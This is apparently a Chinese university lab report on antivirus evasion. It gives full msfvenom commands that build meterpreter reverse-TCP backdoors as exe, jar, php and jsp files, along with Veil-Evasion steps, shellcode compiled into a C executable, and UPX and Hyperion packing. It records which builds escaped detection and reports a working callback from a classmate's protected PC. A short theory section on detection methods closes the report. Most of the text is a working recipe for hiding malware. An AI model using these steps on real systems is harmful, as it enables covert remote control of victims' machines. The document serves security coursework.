1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程;
2、通过组合应用各种技术实现恶意代码免杀;
3、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本;
1、在命令行输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf.exe
,生成5214msf.exe。将5214msf.exe上传到Virus Total进行检测,检测结果如下,有50个杀软检测出来了。
2、上面是只进行一次编码,接下来编码十次:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf-10.exe
。再把它上传到VirusTotal,检测结果如下:
可以看到还是有48个杀软检测出来了,编码多次和编码一次的免杀效果差别不大。因为我们使用的是同样的模板,杀软只要针对这个模板有所防备就行了,
1、生成jar:msfvenom -p java/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 W >5214msf-java.jar
,检测结果:
2、生成php:msfvenom -p php/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f raw >5214msf-php.php
,检测结果:
3、生成jsp:msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.20.10.3 LPORT=5214 R >5214msf-jsp.jsp
,检测结果:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install veil-evasion
veil
打开veil,第一次打开时需要进行安装2、打开veil后,先输入use evasion
进入evasion界面。
输入use c/meterpreter/rev_tcp.py
set LHOST 172.20.10.3
设置回连地址(这里的IP地址是kali虚拟机的ip地址)set LPORT 5214
设置回连端口generate
生成文件最后输入你想要给后门程序起的名字,这里我输入的是5214-veil
。成功生成文件:
文件默认在/var/lib/veil/output/compiled/5214-veil1.exe
。
4、使用VirusTotal进行检测,发现还是有37个杀软能够检测出来:
1、在命令行中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f c
来生成C语言格式的ShellCode数组。
2、创建5214-shell.c
创建.c文件,输入下图中的代码,其中buf数组中的值就是上面生成的。
3、输入i686-w64-mingw32-g++ 5214-shell.c -o 5214-shell.exe
进行编译。将得到的5214-shell.exe先使用VirusTotal进行检测,结果如下:
4、打开msfconsole,再在本机上打开5214-shell.exe,此时发现无法连接(但是在下面加壳过后就可以连接上了)
5、结合使用不同编码器:msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=172.20.10.3 LPORT=5214 -f c
6、创建5214-shell-extend.c
创建.c文件,输入下图中的代码,其中buf数组中的值就是上面生成的(buf太长,省略一部分)。
7、输入i686-w64-mingw32-g++ 5214-shell-extend.c -o 5214-shell-extend.exe
进行编译。将得到的5214-shell-extend.exe先使用VirusTotal进行检测,结果如下:
加壳是对相应的资源进行压缩,压缩后仍可运行。它可以用来保护版权,但同时许多病毒也利用它来作为原理。接下来将使用压缩壳和保密壳来进行试验。
输入upx 5214-shell.exe -o UPX5214-shell.exe
进行加壳
加壳后进行检测,如下:
尝试进行回连,成功:
考虑到下一步就是组合技术实现免杀,所以我就直接把加压缩壳后的文件直接再加加密壳。
将UPX5214-shell.exe复制到/usr/share/windows-binaries/hyperion/
在目录/usr/share/windows-binaries/hyperion/
下输入wine hyperion.exe -v UPX5214-shell.exe HyperionUPX5214-shell.exe
再次进行加壳:
进行免杀检测:
尝试进行回连:
hyUPX5214-shell.exe
放到本机中,发现没有被查杀:把文件发到同学的电脑上(装有腾讯管家13.0.19837.233),没有被杀掉。
在我的kali上打开msfconsole,然后在同学的电脑上运行后门程序,成功连上
1、在使用msf生成的shellcode编译成文件来尝试进行回连时失败了,但是加壳后回连就成功了。现在还没有发现其原因。
2、老师的指导书中一些说杀软杀不出来的地方,结果杀软都杀掉了。。。这是不是也说明了杀毒软件也是在不停发展的?我们实验所用的处理软件都是比较常用的,加上我们的步骤都是比较简单的,很容易成为杀软的识别对象。
答:基于特征码的检测:简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
启发式恶意软件检测:对恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,就把它当成一个恶意软件进行检查。典型的行为如连接恶意网站、开放端口、修改系统文件,典型的“外观”如文件本身签名、结构、厂商等信息等。
基于行为的恶意软件检测:基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式
答:免杀就是让安插的后门不被AV软件发现
答:从实验中就可以知道不可以。
这次实验让我知道了有很多杀毒软件其实是不管用的,一些简单的操作就能够迷惑他们。但是,杀毒软件也是不断地在更新的,以前学长学姐们可以正常存留下来的程序,我在做的时候就都被杀软发现了。感觉实验还是很有趣的,毕竟和现实练习是很密切的。这次实验让我感受到了免杀的强大力量,也让我感受到了自己的能力有限。今后应加强学习,不断提高自己的网络安全能力。
20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
原文:https://www.cnblogs.com/zhuwenyuan/p/10629279.html